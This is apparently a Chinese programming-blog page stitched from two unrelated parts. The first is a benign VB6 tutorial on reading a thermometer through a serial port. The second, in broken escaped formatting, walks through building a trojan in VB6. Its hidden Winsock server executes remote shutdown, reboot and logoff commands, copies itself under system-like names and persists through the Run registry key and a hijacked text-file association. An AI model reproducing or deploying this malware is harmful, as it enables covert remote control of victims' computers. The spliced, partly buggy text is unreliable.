我也是自己摸索开发出来的每一款VBtoCOM通讯,有具体的思路如下:
给你推荐一个工具“com串口测试工具 ComTone V1.0 中文绿色版”
1、打开你的噪音计的测试软件,调整好串口号、通讯频率等等,我用温度计举例说明。
开始查询后有返回数值,这个Receive:就是返回的数值000304012200004b05,
打开串口监视精灵,监视软件的com口事件:
这里面的Write是测试软件发出的查询指令,read是设备返回的数据指令
Private Sub Command1_Click() '发送指令If Not MSComm1.PortOpen Then
MSComm1.CommPort = 7 '串口为7
MSComm1.Settings = "9600,n,8,1"
MSComm1.InBufferCount = 0 '清除接收缓冲区
MSComm1.OutBufferCount = 0 '清除发送缓冲区
MSComm1.InputMode = comInputModeBinary '二进制接收
MSComm1.InputLen = 0 '读取接收缓冲区的所有字符
MSComm1.PortOpen = True '打开串口
MSComm1.RTSEnable = False '置为发送状态
End If
Dim pu() As Byte
Dim strdata As String
Dim crc_js() As Byte
ReDim pu(7) '这个数组是8位的查询指令
pu(0) = "&H00" '温度计地址
pu(1) = "&H03" '查询指令
pu(2) = "&H00" '2、3为温度计地址
pu(3) = "&H00" '2、3为温度计地址
pu(4) = "&H00" '4、5为读取寄存器长度
pu(5) = "&H02" '4、5为读取寄存器长度
pu(6) = "&HC5" '6、7为CRC校验码 因为我们不知道设备的CRC校验规则所以用测试软件产生的校验码
pu(7) = "&HDA" '6、7为CRC校验码
MSComm1.Output = pu
'不做任何事情,仅仅允许其它应用程序处理它们的事件。
DoEvents
MSComm1.InBufferCount = 0 '清除接收缓冲区
MSComm1.RThreshold = 9 '所要接收的数据长度,我们通过COM检测精灵看到了回传数据一共是9字节
MSComm1.RTSEnable = True '转为接收状态
End Sub
Private Sub Command2_Click()
Timer1.Enabled = False
End Sub
Private Sub Form_Unload(Cancel As Integer)
If MSComm1.PortOpen Then
MSComm1.PortOpen = False '关闭串口
End If
Timer1.Enabled = False
End Sub
Private Sub MSComm1_OnComm() 'COM事件
Dim PA() As Byte
Dim PB As String
Select Case MSComm1.CommEvent
Case comEvReceive
MSComm1.InputLen = 0 '读取接收缓冲区的所有字符
PB = MSComm1.Input
PA() = PB
For i = 0 To UBound(PA())
'Print "PA(" & i & ")" PA(i)
If Len(Hex(PA(i))) = 1 Then
strdata = strdata & "0" & Hex(PA(i))
Else
strdata = strdata & Hex(PA(i))
End If
Next
'回传的数据串:000304012600000AC4,这9字节根据通讯协议我们进行拆分
'00为协议内回传机号,03为读命令,04为返回的数据长度 0126 为我要的温度数据为十六进制表达,下面我进行数据处理
wd = CLng("&H" & Left(Right(strdata, 12), 4)) / 10 & "℃" '根据通讯协议换算成温度
Text1 = Text1 & vbCrLf & strdata & " " & wd
strdata = ""
MSComm1.PortOpen = False '关闭串口
End Select
End Sub
Private Sub Timer1_Timer()
Call Command1_Click
End Sub
这是我的测试结果。
下面是通讯协议
这个是我的软件用检测精灵检测的结果
首先,新建一工程,名为Server,新建一个窗体,Name为frmServer,在窗体中加入一个winsock控件,Name设为sckServer,协议设为默认的TCP/IP协议。\x0d\x0a接下来我们回来frmServer窗体模块中,添加如下代码:\x0d\x0aPrivate Sub form_Load()\x0d\x0a With Me\x0d\x0a .sckServer.LocalPort = 4000‘本地端口\x0d\x0a .sckServer.Listen ‘开始监听\x0d\x0a End With\x0d\x0aEnd Sub\x0d\x0a‘接受客户端的连接请求。\x0d\x0aPrivate Sub sckServer_ConnectionRequest(ByVal requestID As Long)\x0d\x0a With Me\x0d\x0a If .sckServer.State sckClosed Then .sckServer.Close\x0d\x0a .sckServer.Accept (requestID)\x0d\x0a End With\x0d\x0aEnd Sub\x0d\x0a下面我们来建立客户端程序:新建一个工程,名为Client,把窗体名为frmClient,在上面加入一个winsock控件,名为sckClient,协议为TCP/IP协议。再加一个按钮cmdConnect在窗体模块中加入代码:\x0d\x0aPrivate Sub form_Load()\x0d\x0a With Me\x0d\x0a .sckClient.RemoteHost = "127.0.0.1"‘设置远程IP,本例设为本机。\x0d\x0a .sckClient.RemotePort = 4000 ‘远程端口,就为server中的设置一样.\x0d\x0a End With\x0d\x0aEnd Sub\x0d\x0aPrivate sub cmdConnect_Click()\x0d\x0aSckClient.Connect\x0d\x0aEnd sub\x0d\x0a至此,单击Connect按钮我们的两个工程已经可以进行通信了,但看不见,你可以在Client中的sckClient_Connect事件中加入代码:debug.print “Connetion successful!”来查看。\x0d\x0a这仅是第一步,一点工作也做不了,下面我们来为它们添加功能。为了简单,我们打算实现一点小小的功能———关机,重启,注销。好,开始吧!\x0d\x0a在Server工程中新建一个模块,Name为modApi,这个模快为一些API函数,添加如下API函数:\x0d\x0a Public Declare Function ExitWindowsEx Lib "user32" Alias "ExitWindowsEx" (ByVal uFlags As Long, ByVal dwReserved As Long) As Long\x0d\x0aPublic Const EWX_LOGOFF = 0\x0d\x0aPublic Const EWX_REBOOT = 2\x0d\x0aPublic Const EWX_SHUTDOWN = 1\x0d\x0aPublic Declare Function ClipCursor Lib "user32" Alias "ClipCursor" (lpRect As Any) As Long\x0d\x0aPublic Type RECT\x0d\x0a Left As Long\x0d\x0a Top As Long\x0d\x0a Right As Long\x0d\x0a Bottom As Long\x0d\x0aEnd Type\x0d\x0a注:在两个socket中编程中,进行通信的重要事件是DataArrival事件,用于接收远程数据。\x0d\x0a下面在Client工程的frmClient窗体中放入三个按钮,分别为cmdExit,cmdLogoff,cmdReboot。它们用于对远程的关机,注销,重启 *** 作。分别添加如下代码:\x0d\x0aPrivate Sub cmdExit_Click()\x0d\x0a Me.sckClient.SendData "Exit"\x0d\x0aEnd Sub\x0d\x0a\x0d\x0aPrivate Sub cmdLogoff_Click()\x0d\x0a Me.sckClient.SendData "Logoff"\x0d\x0aEnd Sub\x0d\x0a\x0d\x0aPrivate Sub cmdReboot_Click()\x0d\x0a Me.sckClient.SendData "Reboot"\x0d\x0aEnd Sub\x0d\x0a全都是对服务端发出请求。下面转到Server工程中:在frmServer中添加sckServer的DataArrial事件,接收客户端的请求。\x0d\x0aPrivate Sub sckServer_DataArrival(ByVal bytesTotal As Long)\x0d\x0a Dim strData As String\x0d\x0a With Me\x0d\x0a '' 接收客户请求的信息\x0d\x0a .sckServer.GetData strData\x0d\x0a Select Case strData\x0d\x0a Case "Exit"\x0d\x0a ''关机\x0d\x0a Call ExitWindowsEx(EWX_SHUTDOWN, 0)\x0d\x0a Case "Reboot"\x0d\x0a ''重启\x0d\x0a Call ExitWindowsEx(EWX_REBOOT, 0)\x0d\x0a Case "Logoff"\x0d\x0a ''注销\x0d\x0a Call ExitWindowsEx(EWX_LOGOFF, 0)\x0d\x0a End Select\x0d\x0a End With\x0d\x0aEnd Sub\x0d\x0a好了,到此我们已经实现功能了,但还不行,我们要它在背后运行。这简单,在frmServer中的form_Load事件中加入一句:me.hide。好这下看不见了,但大家知道木马是一开机就自动运行了,这又是为什么,怎么实现的?把它加入到注册表的启动组中?对,不错,跟我来吧!\x0d\x0a回到Server工程中的modApi中加入如下API函数:\x0d\x0aPublic Declare Function RegOpenKey Lib "advapi32.dll" Alias "RegOpenKeyA" (ByVal hKey As Long, ByVal lpSubKey As String, phkResult As Long) As Long\x0d\x0aPublic Declare Function RegSetvalueEx Lib "advapi32.dll" Alias "RegSetvalueExA" (ByVal hKey As Long, ByVal lpvalueName As String, ByVal Reserved As Long, ByVal dwType As Long, lpData As Any, ByVal cbData As Long) As Long\x0d\x0aPublic Declare Function RegCreateKey Lib "advapi32.dll" Alias "RegCreateKeyA" (ByVal hKey As Long, ByVal lpSubKey As String, phkResult As Long) As Long\x0d\x0aPublic Const REG_BINARY = 3\x0d\x0aPublic Const REG_SZ = 1\x0d\x0aPublic Const HKEY_LOCAL_MACHINE = &H80000002\x0d\x0aPublic Const HKEY_CLASSES_ROOT = &H80000000\x0d\x0a写到注册表启动组中的过程。\x0d\x0aPublic Sub StartupGroup()\x0d\x0a Dim sKey As String\x0d\x0a Dim result As Long\x0d\x0a Dim hKeyID As Long\x0d\x0a Dim sKeyVal As String\x0d\x0a \x0d\x0a sKey = "Systrsy" ''启动组中的键,找一个与系统文件相近的。\x0d\x0a sKeyVal = "C:\windows\system\systrsy.exe" ''木马文件的路径,可以用GetSystemDirectory来取得系统路径。\x0d\x0a result = RegOpenKey(HKEY_LOCAL_MACHINE, _\x0d\x0a "Software\Microsoft\Windows\CurrentVersion\Run", hKeyID)\x0d\x0a If result = 0 Then\x0d\x0a result = RegSetvalueEx(hKeyID, sKey, 0&, REG_SZ, sKeyVal, _\x0d\x0a Len(sKey) + 1)\x0d\x0a End If\x0d\x0aEnd Sub\x0d\x0a好就这样简单地完成了。但是,想过没有,如果不是很菜的鸟,到注册表中见一删,我们苦苦的心血不就白白地浪费了吗?不行,还得想让他发现了删也删不掉。请看下面的代码:\x0d\x0aPublic Sub WriteToTxt()\x0d\x0a Dim result As Long\x0d\x0a Dim hKeyID As Long\x0d\x0a Dim skey As String\x0d\x0a Dim skeyVal As String\x0d\x0a skey = "txtfile\shell\open\command"\x0d\x0a skeyVal = "C:\windows\system\txtView.exe"\x0d\x0a result = RegOpenKey(HKEY_CLASSES_ROOT, skeyVal, hKeyID)\x0d\x0a If result = 0 Then\x0d\x0a result = RegSetvalueEx(hKeyID, skey, 0&, REG_SZ, _\x0d\x0a skeyVal, Len(skeyVal) + 1)\x0d\x0a End If\x0d\x0aEnd Sub\x0d\x0a肯定不少朋友一看就知道了,原是与txt文件进行关联,一点也不错,但C:\windows\system\txtView.exe是哪里来的,我们的木马是C:\windows\system\systrsy.exe呀。这可是我们木马的分身了。\x0d\x0a好,回到Server工程的frmServer窗体的form_Load中,加入如下代码:\x0d\x0aDim sCurrentPath As String, sSystemDir As String\x0d\x0a sCurrentPath = App.Path &"\" &App.EXEName &".exe"\x0d\x0a sSystemDir = “C:\windows\system”\x0d\x0a On Error Resume Next\x0d\x0a‘复制文件成系统目录下的Systrsy.exe\x0d\x0a FileCopy sCurrentPath, sSystemDir &"\Systrsy.exe"\x0d\x0a On Error Resume Next\x0d\x0a复制文件成系统目录下的txtView.exe\x0d\x0a FileCopy sCurrentPath, sSystemDir &"\txtView.exe"\x0d\x0a\x0d\x0a调用\x0d\x0aCall startupGroup\x0d\x0aCall WriteToTxt\x0d\x0a\x0d\x0a''判断程序是否下在运行\x0d\x0a If App.PrevInstance Then\x0d\x0a ‘如果已经运行就退出。\x0d\x0a End\x0d\x0a End If欢迎分享,转载请注明来源:内存溢出
评论列表(0条)